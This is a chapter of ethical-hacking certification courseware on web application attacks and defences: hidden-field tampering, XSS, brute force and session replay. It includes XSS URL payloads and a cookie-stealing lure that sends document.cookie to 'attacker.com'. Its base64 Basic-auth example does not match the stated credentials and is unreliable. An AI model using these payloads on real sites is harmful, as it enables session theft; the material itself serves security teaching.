Module Objectives


This module examines some of the vulnerabilities that have security implications within web applications. The objective is to emphasize on the need to secure the applications as they permit an attacker to compromise a web server or network over the legitimate port of entry. As more businesses are hosting web based applications as a natural extension of themselves, the damage that can result as a result of compromise assumes significant proportions. After completing this module you will be familiar with the following aspects:

  • Understanding Web Application Security

  • Common Web Application Security Vulnerabilities

  • Web Application Penetration Methodologies

  • Input Manipulation

  • Authentication And Session Management

  • Tools: Lynx, Teleport Pro, Black Widow, Web Sleuth

  • Countermeasures

start sidebar
Understanding Web Application Security
click to expand
end sidebar
 
Note  

Web based application security differs from the general discussion on security. In the general context, usually an IDS and/firewall lends some degree of security. However in the case of web applications, the session takes place through the allowed port - the default web server port 80. This is equivalent to establishing a connection without a firewall. Even if encryption is implemented, it only encrypts the transport protocol and in the event of an attack, the attacker's session will just be encrypted in nature. Encryption does not thwart the attack.

Attacking web applications is one of the most common way attackers compromise hosts, networks and users. It is a challenging task to defend against these attacks as there is no scope for logging the actions performed. This is particularly true for today's business applications where a significant percentage of applications are custom made or sourced from third party software components.

Apart from user awareness and adoption of these software components, improper integration of these components can lead to security concerns. While the trend is to separate the business logic as a separate layer, improper integration with existing software can result in interruptions in the flow of business logic. This mismatch may be patched up to complete the functionality of the application. In the process however, it may give rise to a vulnerability that can be exploited to gain access to the data or manipulate the business logic that handles the data.

The alarming fact is that generally nobody notices this, until serious damage has been done. To the end user the application may be functioning as desired. At the organization level, complacency settles in as the organization considers itself secure due to strong networking security. The fact that application level attacks take place over a single port of entry legitimately open for business needs is often forgotten.

start sidebar
Common Web Application Vulnerabilities
  • Reliability of Client-Side Data

  • Special Characters that have not been escaped

  • HTML Output Character Filtering

  • Root accessibility of web applications

  • ActiveX/JavaScript Authentication

  • Lack of User Authentication before performing critical tasks.

end sidebar
 

It has been noted that more often web application vulnerability can be eliminated to a great extent by the way they are designed. Apart from this, common security procedures are often overlooked by the functioning of the application.

Threat  

Reliability of Client-Side Data: It is recommended that the web application rely on server side data for critical operations rather than the client side data, especially for input purposes.

Threat  

Special Characters that have not been escaped: Often this aspect is overlooked and special characters that can be used to modify the instructions by the attackers are found in the web application code. For example, UTF-7 provides alternative encoding for "<" and ">", and several popular browsers recognize these as the start and end of a tag.

Threat  

HTML Output Character Filtering: Output filtering helps a developer build an application which is not susceptible to cross site scripting attacks. When information is displayed to users, it should be escaped. HTML should be rendered inactive to prevent cross site scripting attacks.

Threat  

Root accessibility of web applications: Ideally web applications should not expose the root directory of the web server. Sometimes, it is possible for the user to access the root directory if he can manipulate the input or the URL.

Threat  

ActiveX/JavaScript Authentication: Client side scripting languages are vulnerable to attacks such as cross side scripting.

Threat  

Lack of User Authentication before performing critical tasks: An obvious security lapse, where restricted area access is given without proper authentication, reuse of authentication cache or poor logout procedures. These applications can be vulnerable to cookie based attacks.

start sidebar
Web Application Penetration Methodologies
  • Information Gathering and Discovery

    • Documenting Application / Site Map

    • Identifiable Characteristics / Fingerprinting

    • Signature Error and Response Codes

    • File / Application Enumeration

      • Forced Browsing

      • Hidden Files

      • Vulnerable CGIs

      • Sample Files

  • Input/Output Client-Side Data Manipulation

end sidebar
 
Attack Methods  

Penetrating web servers is no different from attacking other systems when it comes to the basic methodology. Here also, we begin with information gathering and discovery. This can be anything from searching for particular file types / banners on search engines like google. For examples, searching for "index/" may bring up unsuspecting directories on interesting sites where one may find information that can be used for penetrating the web server.

Another area of interest is identifying the nature of the web application and going over the site map to detect weak areas. This may be a link with another site or a link to the intranet itself. The attacker can go over the source code and find links to other pages, form fields that are vulnerable. Apart from this, forcing the application to return errors can help in fingerprinting and identifying the host. This exercise can also reveal vulnerabilities that can be exploited.

File and application enumeration can be done through forced browsing, discovering hidden files, vulnerable CGIs and sample Files.

Finally, the real penetration can be carried out through input or output manipulation on the client side. These will be detailed in the following pages

start sidebar
Hacking Tool: Instant Source

http://www.blazingtool.com

  • Instant Source lets you take a look at a web page's source code, to see how things are done. Also, you can edit HTML directly inside Internet Explorer!

  • The program integrates into Internet Explorer and opens a new toolbar window which instantly displays the source code for whatever part of the page you select in the browser window.

end sidebar
 
Tools  

Instant Source is an application that lets the user view the underlying source code as he browses a web page. The traditional way of doing this has been the View Source command in the browser. However, the process was tedious as the viewer has to parse the entire text file if he is searching for a particular block of code. Instant Source allows the user to view the code for the selected elements instantly without having to open the entire source.

The program integrates into Internet Explorer and opens a new toolbar window, instantly displaying the source code of the page / selection in the browser window. Instant Source can show all Flash movies, script files (*.JS, *.VBS), style sheets (*.CSS) and images on a page. All external files can be demarcated and stored separately in a folder. The tool also includes HTML, JavaScript and VBScript syntax highlighting and support for viewing external CSS and scripts files directly in the browser. This is not available from the view source command option.

With dynamic HTML, the source code changes after the basic HTML page loads - which is the HTML that was loaded from the server without any further processing. Instant Source integrates into Internet Explorer and shows these changes, thereby eliminating the need for an external viewer.

While this is a handy tool for developers, let us look at possible misuse of this tool. A user with a malicious intent can scrutinize the source code of a target web application's interactive web component. He can even map the structure of the application if the code reveals it. He can get a rough assessment of the authentication mechanism and session management rendered by the application.

start sidebar
Hacking Tool: Lynx

http://lynx.browser.org

  • Lynx is a text-based browser used for downloading source files and directory links.

click to expand
end sidebar
 
Tools  

Lynx is a text browser client for users running cursor-addressable, character-cell display devices. It can display HTML documents containing links to files on the local system, as well as files on remote systems running http, gopher, ftp, wais, nntp, finger, or cso/ph/qi servers, and services accessible via logins to telnet, tn3270 or rlogin accounts. Current versions of Lynx run on UNIX, VMS, Windows3.x/9x/NT, 386DOS and OS/2 EMX.

Lynx can be used to access information on the Internet, or to build information systems intended primarily for local access. The current developmental Lynx has two PC ports. The ports are for Win32 (95 and NT) and DOS 386+. There Is a SSL enabled version of Lynx for Win32 by the name of lynxw32.lzh

There is a default Download option of Save to disk. This is disabled if Lynx is running in anonymous mode. Any number of download methods such as kermit and zmodem may be defined in addition to this default in the lynx.cfg file.

start sidebar
Hacking Tool: Wget

www.gnu.org/software/wget/wget.html

  • Wget is a command line tool for Windows and Unix that will download the contents of a web site.

  • It works non-interactively, so it will work in the background, after having logged off.

  • Wget works particularly well with slow or unstable connections by continuing to retrieve a document until the document is fully downloaded.

  • Both http and ftp retrievals can be time stamped, so Wget can see if the remote file has changed since the last retrieval and automatically retrieve the new version if it has.

end sidebar
 
Tools  

GNU Wget is a freely available network utility to retrieve files from the Internet using HTTP and FTP. It works non-interactively, allowing the user to enabling work in the background, after having logged off. The recursive retrieval of HTML pages, as well as FTP sites is supported. Can be used to make mirrors of archives and home pages, or traverse the web like a WWW robot.

Wget works well on slow or unstable connections, keeping getting the document until it is fully retrieved and re-getting files from where it left off works on servers (both HTTP and FTP) that support it. Matching of wildcards and recursive mirroring of directories are available when retrieving via FTP. Both HTTP and FTP retrievals can be time-stamped, thus Wget can see if the remote file has changed since last retrieval and automatically retrieve the new version if it has.

By default, Wget supports proxy servers, which can lighten the network load, speed up retrieval and provide access behind firewalls. However, if behind a firewall that requires a socks style gateway, the user can get the socks library and compile wget with support for socks.

Wget allows installation of a global startup file (/etc/wgetrc on RedHat) for site settings. Wget has many features to make retrieving large files or mirroring entire web or FTP sites easy, including: resuming aborted downloads, using REST and RANGE, using filename wild cards and recursively mirror directories, having NLS-based message files for many different languages, optionally converting absolute links in downloaded documents to relative, so that downloaded documents may link to each other locally, running on most UNIX-like operating systems as well as Microsoft Windows, supporting HTTP and SOCKS proxies, persistent HTTP connections and HTTP cookies

start sidebar
Hacking Tool: Black Widow

http://softbytelabs.com

  • Black widow is a website scanner, a site mapping tool, a site ripper, a site mirroring tool, and an offline browser program.

  • Use it to scan a site and create a complete profile of the site's structure, files, E-mail addresses, external links and even link errors.

end sidebar
 
Tools  

Another tool that can be found in an attacker's arsenal is Black Widow. This tool can be used for various purposes because it functions as a web site scanner, a site mapping tool, a site ripper, a site mirroring tool, and an offline browser program. Note its use as a site mirroring tool. An attacker can use it to mirror the target site on his hard drive and parse it for security flaws in the offline mode.

The attacker can also use this for the information gathering and discovery phase by scanning the site and creating a complete profile of the site's structure, files, e-mail addresses, external links and even errors messages. This will help him launch a targeted attack that has more chance of succeeding and leaving a smaller footprint.

The attacker can also look for specific file types and download any selection of files: from 'JPG' to 'CGI' to 'HTML' to MIME types. There is no file size restriction, and the user can download small to large files, that are a part of a site or from a group of sites.

The tool has pre-scan filtering options that can assist the user in configuring his scan operations. Black Widow will scan HTTP sites, SSL sites (HTTPS) and FTP sites. This can aid in gathering information regarding authentication mechanisms and session management techniques.

Another possible use is in following external links and detecting weak security links that can be exploited to gain access into the web application.

start sidebar
Hacking Tool: WebSleuth

http://sandsprite.com/sleuth/

  • WebSleuth is an excellent tool that combines spidering with the capability of a personal proxy such as Achilles.

click to expand
end sidebar
 
Tools  

Websleuth is a tool that combines web crawling with the capability of a personal proxy. The current version of sleuth supports functionality to: convert hidden & select form elements to textboxes; efficient forms parsing and analysis; edit rendered source of WebPages; edit raw cookies in their raw state etc.

It can also make raw http requests to servers impersonating the referrer, cookie etc..; block javascript popups automatically; highlight & parse full html source code; and analyze cgi links apart from logging all surfing activities and http headers for requests and responses.

Sleuth can generate reports of elements of web page; facilitate enhanced i.e. Proxy management, as well as security settings management. Sleuth has the facility to monitor cookies in real-time. Javascript console aids in interacting directly with the pages scripts and remove all scripts in a webpage.

start sidebar
Hidden Field Manipulation
  • Hidden fields are embedded within HTML forms to maintain values that will be sent back to the server.

  • Hidden fields serve as a mean for the web application to pass information between different applications.

  • Using this method, an application may pass the data without saving it to a common backend system (typically a database.)

  • A major assumption about the hidden fields is that since they are non visible (i.e. hidden) they will not be viewed or changed by the client.

  • Web attacks challenge this assumption by examining the HTML code of the page and changing the request (usually a POST request) going to the server.

  • By changing the value the entire logic between the different application parts, the application is damaged and manipulated to the new value.

end sidebar
 
Attack Methods  

Hidden field tampering:

Most of us who have dabbled with some HTML coding have come across the hidden field. For example, consider the code below:

 <input type="hidden" name="ref" size="20" value="http://www.website.com">      <input type="hidden" name="forref" size="20" value= "">      <input type="text" name="username" size="20" value=""> 

Most web applications rely on HTML forms to receive input from the user. However, users can choose to save the form to a file, edit it and then use the edited form to submit data back to the server. Herein lies the vulnerability, as this is a "stateless" interaction with the web application. HTTP transactions are connectionless, one-time transmissions.

The conventional way of checking for the continuity of connection is to check the state of the user from information stored at the user's end (Another pointer to the fallacy in trusting the client side data). This can be stored in a browser in three ways; cookies, encoded URLs and HTML form "hidden" fields

We will discuss cookies and encoded URLs elsewhere in this module. "Hidden" fields are preferred by developers as it has lesser overhead and can hold a lot of information. However, these can be easily tampered with. For instance if an attacker saves a critical form such as authentication form onto his system, he can view the contents of the file/form including values in the "hidden" fields. Using a text editor, he can change any of the hidden fields as the web application can implicitly trust the user input taken by the hidden field.

One way of hedging this risk is to use the HTTP_REFERER header to capture the last page the user has visited. However, anybody with a little programming knowledge can write a script to render this check useless. Checking HTTP_REFERER will catch trivial attempts to tamper with forms, but cannot be relied on for serious web applications. The bottom line is that anything sent back by a web browser: form fields, HTTP headers, and even cookies can all be tampered with and must be considered untrustworthy information.

Detecting "hidden" field tampering adds security in web applications, but for critical apps like e-commerce applications, hidden fields should be avoided at the design level. For instance, consider someone placing an order at amazon.com and briefly leaving their desk half-way through placing an order. Anyone with access to the computer can use "view source" to see the credit card information and other data stored in "hidden" fields (if it is being used). A best practice in developing web applications is to avoid storing vital information in "hidden" fields.

click to expand

This is an online shopping cart using hidden field to pass the pricing information between the order processing system and the order fulfillment system. If the application does not use a backend mechanism to verify the flow of pricing information then altering the price will lead to the ability to buy product for smaller amounts and potentially even negative sums.

Countermeasure  

Countermeasure

The first rule in web application development from a security standpoint is not to rely on the client side data for critical processes. Using encrypted sessions such as SSL or "secure" cookies are advocated instead of using hidden fields. Digital algorithms may be used where values of critical parameters may be hashed with a digital signature to ascertain the authenticity of data. The safest bet would be to rely on server side authentication mechanisms for high security applications.

start sidebar
Input Manipulation
  • URL Manipulation CGI Parameter Tampering

  • HTTP Client-Header Injection

  • Filter/Intrusion Detection Evasion

  • Protocol/Method Manipulation

  • Overflows

end sidebar
 
Attack Methods  

In the context of a web based attack (or web server attack), the attacker will first try to probe and manipulate the input fields to gain access into the web server. They can be broadly categorized as given below.

URL Manipulation CGI Parameter Tampering: This is perhaps the easiest of the lot. By inserting unacceptable or unexpected input in the url through the browser, the attacker tries to gauge whether the server is protected against common vulnerabilities.

HTTP Client-Header Injection: The next accessible point is the HTTP header. Using HTTP tags such as referrer, the attacker can manipulate the client side to suit his needs.

Filter/Intrusion Detection Evasion: The best part of attacking a web server is that the attacker can use the default port of entry - namely port 80 - to gain access into the network. As this is a standard port open for business needs, it is easy to evade intrusion detection systems or firewalls.

Protocol/Method Manipulation: Manipulating the particular protocol or the method used in the function, the attacker can hack into a web server.

Overflows: Some web server vulnerabilities take advantage of buffer overflows. The advantage is that by using buffer overflow techniques, the attacker can also make the server execute a code of his choice, making it easier for him to exploit the server further.

start sidebar
What is Cross Side Scripting (XSS)?
  • A Web application vulnerable to XSS allows a user to inadvertently send malicious data to self through that application.

  • Attackers often perform XSS exploitation by crafting malicious URLs and tricking users into clicking on them.

  • These links cause client side scripting languages )VBScript, JavaScript etc,) of the attacker s choice to execute on the victim's browser.

  • XSS vulnerabilities are caused by a failure in the web application to properly validate user input.

end sidebar
 
Attack Methods  

The simplest description of cross-site scripting can be put as the attack that occurs when a user enters malicious data in a Web site. It can be as simple as posting a message that contains malicious code to a newsgroup. When another person views this message, the browser will interpret the code and execute it, often giving the attacker control of the system. Malicious scripts can also be executed automatically based on certain events, such as when a picture loads. Unlike most security vulnerabilities, CSS doesn't apply to any single vendor's products - instead, it can affect any software that runs on a web server

CSS takes place as a result of the failure of the web based application to validate user supplied input, before returning it to the client system. "Cross-Site" refers to the security restrictions that the client browser usually places on data (i.e. cookies, dynamic content attributes, etc.) associated with a web site. By causing the victim's browser to execute malicious code with the same permissions as the domain of the web application, an attacker can bypass the traditional document object model (DOM) security restrictions. The document object model is accessible application interface that allows client-side languages to dynamically access and modify the content, structure and style of a web page.

Cross-Site Scripting (CSS) attacks require the execution of Client-Side Languages (JavaScript, Java, VBScript, ActiveX, Flash, etc.) within a user's web environment. Cross Site Scripting can result in an attacker stealing cookies, hijacking sessions, changing of web application account settings etc. The most common web components that are vulnerable to CSS attacks include CGI scripts, search engines, interactive bulletin boards, and custom error pages with poorly written input validation routines. Moreover, a victim does not necessarily have to click on a link to make the attack possible.

Brief Example Attack:

Example 1: The IMG tag

">http://host/search/search.cgi?query=<img%20src=http://host2/bait-article.jpg>

Depending on the website setup, this generates html with the image from host2 and feeds it to the user when they click on this link. Depending on the original web page layout it may be possible to entice a user into thinking this is a valid part of the article.

Example 2:

">http://host/something.php?q=<img%20src=JavaScript:wolf-in-lamb-clothing>

If a user clicks on this link a JavaScript popup box displaying the site's domain name will appear. While this example isn't harmful, an attacker could create a falsified form or, perhaps create something that grabs information from the user. The request above is easily questionable to a standard user but with hex, unicode, or %u windows encoding a user could be fooled into thinking this is a valid site link.

Example 3:

Insert whatever here">http://host/<script>Insert<whatever>here whatever

This particular request is very common example.

start sidebar
XSS Countermeasures
  • As a web application user, there are a few ways to protect yourselves from XSS attacks.

  • The first and the most effective solution is to disable all scripting language support in your browser and email reader.

  • If this is not a feasible option for business reasons, another recommendation is to use reasonable caution while clicking links in anonymous e-mails and dubious web pages.

  • Proxy servers can help filter out malicious scripting in HTML.

end sidebar
 
Countermeasure  

Preventing cross-site scripting is a challenging task especially for large distributed web applications. If the application accepts only expected input, then the XSS can be significantly reduced.

Web servers should set the character set, and then make sure that the data they insert is free from byte sequences that are special in the specified encoding. This can typically be done by settings in the application server or web server. The server should define the character set in each html page as below.

 <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> 

Web pages with unspecified character-encoding work mostly because most character sets assign the same characters to byte values below 128. Some 16-bit character-encoding schemes have additional multi-byte representations for special characters such as "<. These should be checked.

The above tells the browser what character set should be used to properly display the page. In addition, most servers must also be configured to tell the browser what character set to use when submitting form data back to the server and what character set the server application should use internally. The configuration of each server for character set control is different, but is very important in understanding the canonicalization of input data. Filtering special meta characters is also important. HTML defines certain characters as "special", if they have an effect on page formatting.

In an HTML body:

"<" introduces a tag.

"&" introduces a character entity.

Note  

Some browsers try to correct poorly formatted HTML and treat ">" as if it were "<".

In attributes:

  • double quotes mark the end of the attribute value.

  • single quotes mark the end of the attribute value.

  • "&" introduces a character entity.

In URLs:

  • Space, tab, and new line denote the end of the URL.

  • "&" denotes a character entity or separates query string parameters.

  • Non-ASCII characters (that is, everything above 128 in the ISO-8859-1 encoding) are not allowed in URLs.

  • The "%" must be filtered from input anywhere parameters encoded with HTTP escape sequences are decoded by server-side code.

Ensuring correct encoding of dynamic output can prevent malicious scripts from being passed to the user. While this is no guarantee of prevention, it can help contain the problem in certain circumstances. The application can make an explicit decision to encode un-trusted data and leave trusted data untouched, thus preserving mark-up content.

start sidebar
Authentication And Session Management
  • Brute/Reverse Force

  • Session Hijacking

  • Session Replay

  • Session Forgoing

  • Page Sequencing

end sidebar
 
Attack Methods  

Brute Force

Brute Forcing involves performing an exhaustive key search of a web application authentication token's key space in order to find a legitimate token that can be used to gain access.

According to rfc2617, the Basic Access Authentication scheme of HTTP is not considered to be a secure method of user authentication (unless used in conjunction with some external secure system such as SSL), as the user name and password are passed over the network as cleartext. To receive authorization, the client sends the userid and password, separated by a single colon (":") character, within a base64 encoded string in the credentials.

user-pass

=

userid ":" password

userid

=

*<TEXT excluding ":">

password

=

*TEXT

For instance, if the user agent wishes to send the userid "Winnie" and password "the pooh", it would use the following header field:

 Authorization: Basic bjplc2vcGZQQWxRpVuIHhZGNFt== 

Therefore, it is relatively easy to brute force a protected page if an attacker uses decent dictionary lists. For the page http://www.victim.com/private/index.html, an attacker can generate base 64 encoded strings with commonly used usernames and a password, generate HTTP requests, and look for a non-404 response:

Attack Methods  

Session Replay

If a user's authentication tokens are captured or intercepted by an attacker, the session can be replayed by the attacker, making the concerned web application vulnerable to a replay attack. In a replay attack, an attacker openly uses the captured or intercepted authentication tokens such as a cookie to create or obtain service from the victim's account; thereby bypassing normal user authentication methods.

A simple example is sniffing a URL with a session ID string and pasting it back into the attacker's web browser. The legitimate user may not necessarily need to be logged into the application at the time of the replay attack. While it is generally that username/password pairs are indeed authentication data and therefore sensitive, it is not generally understood that these generated authentication tokens are also just as sensitive. Many users who may have extremely hard-to-guess passwords are careless with the protection of cookies and session information that can be just as easily used to access their accounts in a replay attack. This is often considered forging "entity authentication" since most applications check the tokens stored in the browser or HTTP stream, and do not require user authentication after each web request.

By simply sniffing the HTTP request of an active session or capturing a desktop user's cookie files, a replay attack can be very easily performed. Exploitation can take the following general forms:

  • Visiting a pre-existing dynamically created URL that is assigned to a specific user's account which has been sniffed or captured from a proxy server log

  • Visiting a specific URL with a preloaded authentication token (cookie, HTTP header value, etc.) captured from a legitimate user

  • A combination of 1 and 2.

Session tokens that do not expire on the HTTP server can allow an attacker unlimited time to guess or brute force a valid authenticated session token. An example is the "Remember Me" option on many retail websites. If a user's cookie file is captured or brute-forced, then an attacker can use these static-session tokens to gain access to that user's web accounts. Additionally, session tokens can be potentially logged and cached in proxy servers that, if broken into by an attacker, may contain similar sorts of information in logs that can be exploited if the particular session has not been expired on the HTTP server. To prevent Session Hijacking and Brute Force attacks from occurring to an active session, the HTTP server can seamlessly expire and regenerate tokens to give an attacker a smaller window of time for replay exploitation of each legitimate token. Token expiration can be performed based on number of requests or time.

Attack Methods  

Session Forging/Brute-Forcing Detection and/or Lockout

Many websites have prohibitions against unrestrained password guessing (e.g., it can temporarily lock the account or stop listening to the IP address). With regard to session token brute-force attacks, an attacker can probably try hundreds or thousands of session tokens embedded in a legitimate URL or cookie for example without a single complaint from the HTTP server. Many intrusion-detection systems do look for this type of attack; penetration tests also often overlook this weakness in web e-commerce systems. Designers can use "booby trapped" session tokens that never actually get assigned but will detect if an attacker is trying to brute force a range of tokens. Anomaly/misuse detection hooks can also be built in to detect if an authenticated user tries to manipulate their token to gain elevated privileges.

Attack Methods  

Session Re-Authentication

Critical user actions such as money transfer or significant purchase decisions should require the user to re-authenticate or be reissued another session token immediately prior to significant actions. Developers can also somewhat segment data and user actions to the extent where reauthentication is required upon crossing certain "boundaries" to prevent some types of cross-site scripting attacks that exploit user accounts.

Attack Methods  

Session Token Transmission

If a session token is captured in transit through network interception, a web application account is then prone to a replay or hijacking attack. Typical web encryption technologies include but are not limited to Secure Sockets Layer (SSLv2/v3) and Transport Layer Security (TLS v1) protocols in order to safeguard the state mechanism token.

Attack Methods  

Session Tokens on Logout

With the popularity of Internet Kiosks and shared computing environments on the rise, session tokens take on a new risk. A browser only destroys session cookies when the browser thread is torn down. Most Internet kiosks maintain the same browser thread. It is recommended to overwrite session cookies when the user logs out of the application.

Attack Methods  

Page Sequencing

Page sequencing is the term given to the vulnerability that arises as a result of poor session management, thereby allowing the user to take an out of turn action and bypass the defined sequence of web pages. This can be something like moving ahead to a later stage of a financial transaction. This arises due to faulty session/application state management.

start sidebar
Traditional XSS Web Application Hijack Scenario - Cookie stealing
  • User is logged on to a web application and the session is currently active. An attacker knows of a XSS hole that affects that application.

  • The user receives a malicious XSS link via an e-mail or comes across it on a web page. In some cases an attacker can even insert it into web content (e.g. guest book, banner, etc,) and make it load automatically without requiring user intervention.

     <html>    <head><title>Look at this!</title></head>    <body><ahref="http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.ht    ml?tw=<script>document.location.replace('http://attacker.com/steal.cgi?'+d    ocument.cookie);</script>"> Check this CNN story out! </a></body>    </html> 
end sidebar
 
Attack Methods  

It is a fact that most web sites address security using SSL for authenticating their login sessions. Let us see how this process takes place. When the client connects to a web site two events take place to ensure security.

  1. The web site must prove that it is the web site it claims to be.

The web site authenticates itself by the SSL certificate issued to the domain in question by a trusted third party. Depending on the extent the user trusts the certificate issuer; s/he can be assured that the web site is what it claims to be.

Once the web site is authenticated by the user, he can choose to establish a secure data connection via the public key mechanism of SSL so that all the data that is transmitted between them is encrypted.

  1. The user must authenticate self to the web site

The user provides his username/password into a form and this data is transmitted in an encrypted fashion to the web site for authentication. If the client is authenticated, a session cookie is generated with appropriate timeout and validation information. This is sent back to the user as a "secure cookie" - i.e. one that is only passed back and forth over SSL.

This can be considered as passing a shared secret back and forth, which is encrypted and is not the actual password and does timeout. If the website does not use cookies, it can opt for session codes that are embedded in the site URLs so that they are never stored in the hard disk of the client computer. Some web sites do require their users to obtain client SSL certificates so that the web site can authenticate the clients via these certificates and thus not need this whole username/password scheme.

Cookies were originally introduced by Netscape and are now specified in RFC 2965 (which supersedes RFC 2109), with RFC 2964 and BCP44 offering guidance on best practice. Cookies were never designed to store usernames and passwords or any sensitive information. There are two categories of cookies, secure or non-secure and persistent or non-persistent, giving four individual cookies types.

  • Persistent and Secure

  • Persistent and Non-Secure

  • Non-Persistent and Secure

  • Non-Persistent and Non-Secure




Staf of EC-Council - Ethical Hacking Student Courseware. Certidied Ethical Hacker-Exam 312-50 (EC-Council E-Business Certification Series)
Staf of EC-Council - Ethical Hacking Student Courseware. Certidied Ethical Hacker-Exam 312-50 (EC-Council E-Business Certification Series)
ISBN: N/A
EAN: N/A
Year: 2003
Pages: 109

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net